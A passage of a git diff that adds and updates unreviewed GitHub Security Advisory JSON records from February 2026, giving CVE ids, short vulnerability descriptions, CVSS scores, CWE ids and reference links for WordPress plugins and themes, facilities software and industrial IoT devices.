"ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69310" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woodly-core/vulnerability/wordpress-woodly-core-plugin-1-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json new file mode 100644 index 0000000000000..402424f7c9e0e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rp93-gq4p-8r62", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26724" + ], + "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the selectgroup and gn parameters on the /?Function=Groups endpoint.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26724" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26724" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json b/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json new file mode 100644 index 0000000000000..fb0bbd45281e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr5c-93pp-mqfv", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67996" + ], + "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Nestin nestin allows Object Injection.This issue affects Nestin: from n/a through < 1.2.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67996" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/nestin/vulnerability/wordpress-nestin-theme-1-2-6-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json b/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json new file mode 100644 index 0000000000000..445ebb98c7a24 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr5p-xfmq-r2vx", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26101" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26101" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26101" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json b/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json new file mode 100644 index 0000000000000..a8fbbf99315da --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrpc-76pm-5w54", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69373" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in beeteam368 VidoRev vidorev allows PHP Local File Inclusion.This issue affects VidoRev: from n/a through <= 2.9.9.9.9.9.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69373" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/vidorev/vulnerability/wordpress-vidorev-theme-2-9-9-9-9-9-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json new file mode 100644 index 0000000000000..497b1d0b4d452 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv4c-25xc-4f6g", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68848" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anmari amr cron manager amr-cron-manager allows Reflected XSS.This issue affects amr cron manager: from n/a through <= 2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68848" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/amr-cron-manager/vulnerability/wordpress-amr-cron-manager-plugin-2-3-reflecte-dcross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json b/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json new file mode 100644 index 0000000000000..69901b8ba53d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rvcv-xmp5-qv44", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69401" + ], + "details": "Authentication Bypass by Spoofing vulnerability in mdalabar WooODT Lite byconsole-woo-order-delivery-time allows Identity Spoofing.This issue affects WooODT Lite: from n/a through <= 2.5.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69401" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/byconsole-woo-order-delivery-time/vulnerability/wordpress-wooodt-lite-plugin-2-5-2-payment-bypass-vulnerability-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json b/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json new file mode 100644 index 0000000000000..bffeaa2077aab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw2x-9m7j-wvrx", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69383" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Agence web Eoxia - Montpellier WP shop wpshop allows PHP Local File Inclusion.This issue affects WP shop: from n/a through <= 2.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69383" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wpshop/vulnerability/wordpress-wp-shop-plugin-2-6-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json new file mode 100644 index 0000000000000..f4067b6fd2983 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw5q-r997-qm48", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69389" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hugh Mungus Visitor Maps Extended Referer Field visitor-maps-extended-referer-field allows Reflected XSS.This issue affects Visitor Maps Extended Referer Field: from n/a through <= 1.2.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69389" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/visitor-maps-extended-referer-field/vulnerability/wordpress-visitor-maps-extended-referer-field-plugin-1-2-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json b/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json index 94f7243bbb7de..7b4e0d6fbabbf 100644 --- a/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json +++ b/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rw72-9mv7-cr6q", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25343" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS wp-sms allows DOM-Based XSS.This issue affects WP SMS: from n/a through <= 7.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json b/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json new file mode 100644 index 0000000000000..e5740935841bc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rxjp-cgw5-jfcg", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26049" + ], + "details": "The web management interface of the device renders the passwords in a \nplaintext input field. The current password is directly visible to \nanyone with access to the UI, potentially exposing administrator \ncredentials to unauthorized observation via shoulder surfing, \nscreenshots, or browser form caching.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26049" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json b/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json new file mode 100644 index 0000000000000..4ccc37f3ebb29 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v36c-x4c4-8wx6", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68022" + ], + "details": "Missing Authorization vulnerability in soporteblue Plugin BlueX for WooCommerce bluex-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Plugin BlueX for WooCommerce: from n/a through <= 3.1.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68022" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bluex-for-woocommerce/vulnerability/wordpress-plugin-bluex-for-woocommerce-plugin-3-1-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json new file mode 100644 index 0000000000000..728988ddf6b00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v534-r4rj-rcvf", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68845" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aThemeArt Translations eDS Responsive Menu eds-responsive-menu allows Reflected XSS.This issue affects eDS Responsive Menu: from n/a through <= 1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68845" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/eds-responsive-menu/vulnerability/wordpress-eds-responsive-menu-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json b/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json new file mode 100644 index 0000000000000..a388ec49baa9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5q2-22j2-xvp3", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69398" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Plank plank allows PHP Local File Inclusion.This issue affects Plank: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69398" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/plank/vulnerability/wordpress-plank-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json b/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json new file mode 100644 index 0000000000000..9bd6097cd90a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6m3-2f65-r5x7", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-20761" + ], + "details": "A vulnerability exists in EnOcean SmartServer IoT version 4.60.009 and \nprior, which would allow remote attackers, in the LON IP-852 management \nmessages, to send specially crafted IP-852 messages resulting in \narbitrary OS command execution on the device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20761" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/DrftSSIoT/pages/1475410/SmartServer+IoT+Release+Notes#Current-Stable-Release" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/IEC/pages/288063529/Enhancing+Security" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-01.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json b/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json new file mode 100644 index 0000000000000..fc981e1d65c82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6x7-wpp7-g26g", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68853" + ], + "details": "Deserialization of Untrusted Data vulnerability in Kleor Contact Manager contact-manager allows Object Injection.This issue affects Contact Manager: from n/a through <= 9.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68853" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/contact-manager/vulnerability/wordpress-contact-manager-plugin-9-0-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json new file mode 100644 index 0000000000000..9f36ac3497bf5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v754-wvf3-33xx", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22372" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Isida isida allows PHP Local File Inclusion.This issue affects Isida: from n/a through <= 1.4.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22372" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/isida/vulnerability/wordpress-isida-theme-1-4-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json b/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json new file mode 100644 index 0000000000000..1c97a2bfac569 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v76h-ch32-xfcr", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22365" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Soleng soleng allows PHP Local File Inclusion.This issue affects Soleng: from n/a through <= 1.0.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22365" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/soleng/vulnerability/wordpress-soleng-theme-1-0-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json new file mode 100644 index 0000000000000..fff849fc5b48c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v859-79r4-4vv5", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24959" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JoomSky JS Help Desk js-support-ticket allows Blind SQL Injection.This issue affects JS Help Desk: from n/a through <= 3.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24959" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/js-support-ticket/vulnerability/wordpress-js-help-desk-plugin-3-0-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json b/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json new file mode 100644 index 0000000000000..999f621f271de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9wq-4qj2-xvh4", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69396" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Splendour splendour allows PHP Local File Inclusion.This issue affects Splendour: from n/a through <= 1.23.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69396" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/splendour/vulnerability/wordpress-splendour-theme-1-23-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json b/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json new file mode 100644 index 0000000000000..7bf08f1488cd2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf3m-rggr-vh64", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-43228" + ], + "details": "Missing Authorization vulnerability in SecuPress SecuPress Free secupress.This issue affects SecuPress Free: from n/a through <= 2.2.5.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43228" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/secupress/vulnerability/wordpress-secupress-free-plugin-2-2-5-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json b/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json index 797cab9aa94ab..7985e87ba666c 100644 --- a/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json +++ b/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vf83-6p8j-54f5", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-27055" ], "details": "Missing Authorization vulnerability in PenciDesign Penci AI SmartContent Creator penci-ai allows Exploiting Incorrectly Configured Access Control Security 